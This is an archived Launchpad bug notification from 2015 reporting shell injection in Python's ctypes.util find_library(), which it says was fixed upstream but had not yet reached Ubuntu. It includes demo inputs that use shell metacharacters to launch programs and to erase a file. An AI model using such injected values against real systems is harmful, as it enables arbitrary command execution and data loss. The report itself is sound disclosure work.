touch-packages team mailing list archive

Thread
Date

[Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

To: touch-packages@xxxxxxxxxxxxxxxxxxx
From: Bernd Dietzel <1512068@xxxxxxxxxxxxxxxxxx>
Date: Sat, 28 Nov 2015 12:34:11 -0000
Reply-to: Bug 1512068 <1512068@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx

Seens the bug is already known and fixed since 2014 but found not its way to ubuntu repos.
http://bugs.python.org/issue22636


** Information type changed from Private Security to Public Security

** Bug watch added: Python Roundup #22636
   http://bugs.python.org/issue22636

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to python2.7 in Ubuntu.
https://bugs.launchpad.net/bugs/1512068

Title:
  Python ctypes.util , Shell Injection in find_library()

Status in python2.7 package in Ubuntu:
  New

Bug description:
  https://github.com/Legrandin/ctypes/issues/1

  The find_library() function can execute code when special chars like ;|`<>$ are in the name.
  The "os.popen()" calls in the util.py script should be replaced with "subprocess.Popen()".

  Demo Exploits for Linux :
  ====================

  >>> from ctypes.util import find_library
  >>> find_library(";xeyes")                    # runs  xeyes 
  >>> find_library("|xterm")                    # runs terminal
  >>> find_library("&gimp")                    # runs gimp
  >>> find_library("$(nautilus)")              # runs filemanager
  >>> find_library(">test")                       # creates, and if exists, erases a file "test"

  ==== Traceback ====

  >>> find_library("`xmessage hello`")    # shows a message, press ctrl+c for Traceback
  ^CTraceback (most recent call last):
    File "<stdin>", line 1, in <module>
    File "/usr/lib/python3.4/ctypes/util.py", line 244, in find_library
      return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name))
    File "/usr/lib/python3.4/ctypes/util.py", line 99, in _findLib_gcc
      trace = f.read()
  KeyboardInterrupt

  ProblemType: Bug
  DistroRelease: Ubuntu 15.10
  Package: libpython2.7-stdlib 2.7.10-4ubuntu1
  ProcVersionSignature: Ubuntu 4.2.0-16.19-generic 4.2.3
  Uname: Linux 4.2.0-16-generic x86_64
  ApportVersion: 2.19.1-0ubuntu4
  Architecture: amd64
  CurrentDesktop: XFCE
  Date: Sun Nov  1 10:34:38 2015
  InstallationDate: Installed on 2015-10-09 (22 days ago)
  InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Alpha amd64 (20151009)
  SourcePackage: python2.7
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/python2.7/+bug/1512068/+subscriptions

References

[Bug 1512068] [NEW] Python ctypes.util , Shell Injection in find_library()
From: Bernd Dietzel, 2015-11-01